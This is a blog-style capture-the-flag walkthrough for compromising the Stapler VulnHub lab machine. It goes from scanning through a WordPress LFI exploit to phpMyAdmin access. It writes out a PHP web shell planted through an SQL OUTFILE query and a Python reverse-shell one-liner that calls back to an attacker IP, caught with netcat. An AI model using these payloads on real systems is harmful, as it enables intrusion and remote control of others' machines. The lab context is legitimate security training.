CTF Challenges Security Tutorials

Stapler VM – Walkthrough

Hi Friends,

Today we will see how to crack Stapler – vulnerable machine, that is available in vulnhub Here.

I will start with discovering the IP of vulnerable machine, using netdiscover

Netdiscover -r

I found that Stapler is running on IP

Information Gathering:

I used NMAP, Nikto and WPScan

Nmap -sS -A -p-

Found Port 21 – FTP is open and Anonymous login is allowed

Port 80 is open, I tried open in browser, got nothing

So tried FTP with Anonymous login, with username Anonymous and Password Anonymous

Logged in successfully and found file called note

Download the note,

ftp> get note

Once again checked nmap result for open ports and found port 12380 is open and Apache service is running

Now run NIKTO scanner on

Found fruitful information like

  • The IP is having SSL, means running on https
  • /admin112233/
  • /blogblog/

Tried access, ohhh

Tried access,

It is a blog, look for web page view-source and found it is running on WordPress

So I ran wordpress scanner I.e., wpscan on URL

Wpscan –url –enumerate uap –disable-tls-checks

Found directory listing is available for plugins folder

Found advanced-video-embed plugin and searched for exploit from exploit-db.com, found https://www.exploit-db.com/exploits/39646/ LFI exploit

This exploit is to get Configuration file of wordpress i.e., wp-config.php

I run the exploit by updating URL but it is throwing errors and I updated some of python code like added

import ssl

ssl._create_default_https_context = ssl._create_unverified_context

Now successfully run the exploit and browse

We can see a jpeg file has been created

Open the file text format

And we got configuration details

Now browse and enter username and password

We got full access to phpmyadmin. We will upload shell using sql

SELECT “<?php echo shell_exec($_GET[‘cmd’]); ?>” INTO OUTFILE “/var/www/https/blogblog/wp-content/uploads/shell.php”


Successfully created shell.php, execute commands like IFCONFIG

Now it’s time to take shell, thanks to pentestmonkey

python%20-c%20’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“”,443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

I created URL and browse,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.10.3%22,1234));%20os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);

Start netcat in kali linux to get shell

Privilege Escalation

I am not the root for this VM I need to do privilege escalation to get root permissions, we know that vm is running on UBUNTU 16.04, search for exploit


Got flag.txt 🙂

Leave a Reply

Your email address will not be published. Required fields are marked *